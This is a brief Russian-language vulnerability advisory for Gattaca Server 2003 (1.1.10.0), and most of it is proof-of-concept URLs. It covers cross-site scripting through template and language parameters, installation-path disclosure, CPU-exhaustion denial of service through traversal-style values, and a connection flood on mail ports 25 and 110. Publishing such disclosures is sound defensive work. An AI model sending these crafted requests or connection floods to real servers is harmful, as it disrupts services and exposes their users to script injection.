Программа: Gattaca Server 2003 (1.1.10.0) 

Несколько уязвимостей обнаружено в Gattaca Server 2003. Удаленный пользователь может аварийно завершить работу сервера. Удаленный пользователь может определить инсталляционный путь и Web root каталог. Удаленный пользователь может выполнить XSS нападение. 

1. XSS: 

http://[host]/web.tmpl?HELPID= 8000&TEMPLATE= skins//water&LANGUAGE=[code]//[code]
http://[host]/web.tmpl?HELPID= 8000&TEMPLATE= [code]//[code]&LANGUAGE=lang//en

2. Раскрытие пути: 

http://[host]/%00
http://[host]/web.tmpl?HELPID= 8000&TEMPLATE= skins//water&LANGUAGE=[what
ever]

3. DoS (100% CPU): 

http://[host]/index.tmpl?HELPID= 1000&TEMPLA TE=skins// water&LANGUAGE=/
http://[host]/web.tmpl?HELPID= 8000&TEMPLATE=skins// water&LANGUAGE=/../../../../
http://[host]/web.tmpl?HELPID= 8000&TEMPLATE=skins// water&LANG UAGE=.
http://[host]/web.tmpl?HELPID= 8000&TEMPLATE=skins// water&LANGUAGE=/
http://[host]/web.tmpl?HELPID= 8000&TEMPLATE=skins// water&LANGUAGE=\
http://[host]/web.tmpl?HELPID= 8000&TEMPLATE=skins// [whatever]&LANGUAGE=lang//en

4. Также удаленный пользователь может открыть около 600 подключений к целевому серверу на 25 и 110 TCP порту, чтобы аварийно завершить работу сервера.

Оставить мнение